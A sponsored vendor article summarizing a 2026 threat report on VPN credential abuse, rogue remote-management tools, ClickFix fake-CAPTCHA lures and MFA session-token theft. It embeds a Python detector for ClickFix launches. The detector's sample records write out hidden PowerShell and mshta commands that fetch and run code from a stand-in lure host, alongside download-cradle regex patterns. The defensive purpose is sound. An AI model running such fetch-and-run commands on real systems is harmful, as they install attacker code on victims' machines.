Wednesday, April 1, 2026

Routine Access Is Powering Modern Intrusions, a New Threat Report Finds


Remote access and trusted administrative tools play a central role in how organizations operate today. According to Blackpoint Cyber's 2026 Annual Threat Report, they are also increasingly central to how intrusions begin.

Informed by analysis of thousands of security investigations conducted during the reporting period, the report highlights a shift in attacker behavior. Rather than relying primarily on vulnerability exploitation, threat actors frequently gained access by using valid credentials, legitimate tools, and routine user-driven actions.

The report examines these patterns, documents where intrusion activity was disrupted, and presents defensive priorities derived from analyzed incident response outcomes observed throughout 2025.

Additional data and incident walkthroughs will be covered during an upcoming live webinar hosted by Blackpoint Cyber.

➡️ Register here

Key Findings From the 2026 Annual Threat Report

Attackers Are Entering Through Legitimate Access Paths

Across incidents analyzed in the report, attackers were more likely to log in using legitimate access than to exploit vulnerabilities as their primary entry point.

SSL VPN abuse accounted for 32.8 percent of all identifiable incidents, making it one of the most common initial access vectors. In many cases, threat actors authenticated using valid but compromised credentials, resulting in VPN sessions that appeared legitimate to security controls.

Once access was established, these sessions often provided broad internal reach, allowing attackers to move quickly toward high-value systems without immediately triggering alerts.

Trusted IT Tools Are Being Used Against Organizations

The report also documents frequent abuse of legitimate Remote Monitoring and Management tools as a means of access and persistence.

RMM abuse appeared in 30.3 percent of identifiable incidents, with ScreenConnect present in more than 70 percent of rogue RMM cases. Because these tools are commonly used for standard IT administration, unauthorized installations often resembled expected activity and were difficult to distinguish without strong visibility.

The report notes that environments with multiple remote access tools in use were more likely to see rogue instances blend in with existing tooling.

Social Engineering, Not Exploits, Drove the Majority of Incidents

While legitimate access paths enabled many intrusions, user interaction represented the largest driver of overall incident volume.

Fake CAPTCHA and ClickFix-style campaigns accounted for 57.5 percent of all identifiable incidents, making them the most common attack pattern documented in the report.

Rather than exploiting software vulnerabilities, these campaigns relied on deceptive prompts. Users were instructed to paste commands into the Windows Run dialog as part of what appeared to be a routine verification step. Execution used built-in Windows tools, without traditional malware downloads or exploit activity.
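As an added example (not code from the report or from Blackpoint Cyber), the Python below scores constructed process-creation records for the ClickFix pattern just described: a built-in Windows tool launched from explorer.exe, which hosts the Run dialog, with command-line traits such as a hidden window, no profile, or a download cradle. The record format, sample lines, tool list and threshold are assumptions.

```python
import re
# Constructed sample process-creation records (not taken from the report).
# Format: parent=<parent image> cmd=<full command line of the new process>.
SAMPLE_EVENTS = [
    'parent=explorer.exe cmd="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -w hidden -nop -c "iex (irm https://lure.example.invalid/verify)"',
    'parent=explorer.exe cmd="C:\\Windows\\System32\\mshta.exe" https://lure.example.invalid/captcha.hta',
    'parent=explorer.exe cmd="C:\\Program Files\\Notepad++\\notepad++.exe" notes.txt',
    'parent=services.exe cmd="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -w hidden -File C:\\scripts\\backup.ps1',
]

# Built-in Windows tools that pasted ClickFix commands typically hand off to (assumed list).
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "curl.exe", "bitsadmin.exe", "certutil.exe"}

# Command-line traits scored one point each; none is conclusive on its own.
INDICATORS = {
    "hidden window": re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "encoded command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "no profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "download cradle": re.compile(r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I),
    "remote url": re.compile(r"https?://", re.I),
    "remote script": re.compile(r"https?://\S+\.(?:hta|ps1|js|vbs|bat)\b", re.I),
}

def parse_event(line):
    """Split one record into its parent image and command line (None if malformed)."""
    m = re.match(r"parent=(\S+)\s+cmd=(.+)$", line.strip())
    return {"parent": m.group(1).lower(), "cmd": m.group(2)} if m else None

def child_image(cmd):
    """Bare executable name of the launched process, handling quoted paths with spaces."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmd)
    path = (m.group(1) or m.group(2)) if m else ""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def assess(line, threshold=2):
    """Return (child image, score, reasons) for a ClickFix-style launch, else None.
    The Run dialog is hosted by explorer.exe, so only explorer-parented launches of
    built-in tools qualify; the threshold keeps routine admin use below the bar."""
    ev = parse_event(line)
    image = child_image(ev["cmd"]) if ev else ""
    if ev is None or ev["parent"] != "explorer.exe" or image not in LOLBINS:
        return None
    reasons = [name for name, rx in INDICATORS.items() if rx.search(ev["cmd"])]
    return (image, len(reasons), reasons) if len(reasons) >= threshold else None

def hunt(events, threshold=2):
    """Triage a batch of records, keeping only the hits."""
    return [hit for hit in (assess(line, threshold) for line in events) if hit]
```

Only the two explorer-launched interpreter records score at or above the threshold; the notepad launch and the service-parented scheduled script do not.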

Cloud Intrusions Focused on Session Reuse After MFA

Multi-factor authentication was enabled in many cloud environments associated with investigated incidents, yet account compromise still occurred.

Adversary-in-the-Middle phishing accounted for about 16 percent of cloud account disables documented in the report. In these scenarios, MFA functioned as designed. Instead of bypassing authentication, attackers captured authenticated session tokens issued after successful MFA and reused them to access cloud services.

From the perspective of the cloud platform, this activity aligned with a legitimate authenticated session.

Many of the attacks described above begin with legitimate access. What happens next is where real damage occurs.

In a recent investigation, our SOC identified a new implant called Roadk1ll, designed to pivot across systems using WebSocket-based communication and maintain access while blending into network traffic.

Join Inside the SOC Episode #002 to see how these attacks progress from initial access to full environment compromise.

Save your seat

What These Findings Mean for Security Teams

Across industries, environments, and attack types, the report highlights a consistent pattern: many successful intrusions relied on activity that blended into normal operations.

Rather than relying on novel exploits or advanced malware, attackers abused everyday workflows such as remote logins, trusted tools, and common user actions. Based on the attack chains analyzed, the report identifies several defensive priorities:

  • Treat remote access as high-risk, high-impact activity
  • Maintain a complete inventory of approved RMM tools and remove unused or legacy agents
  • Restrict unapproved software installations and limit execution from user-writable directories
  • Apply Conditional Access controls that evaluate device posture, location, and session risk

These patterns were documented across frequently targeted sectors, including manufacturing, healthcare, MSPs, financial services, and construction.

For teams interested in examining how these intrusion patterns unfold, Blackpoint Cyber will review key findings, case examples, and defensive takeaways from the 2026 Annual Threat Report during an upcoming live webinar.

➡️ Register to receive the 2026 Annual Threat Report

Sponsored and written by Blackpoint Cyber.
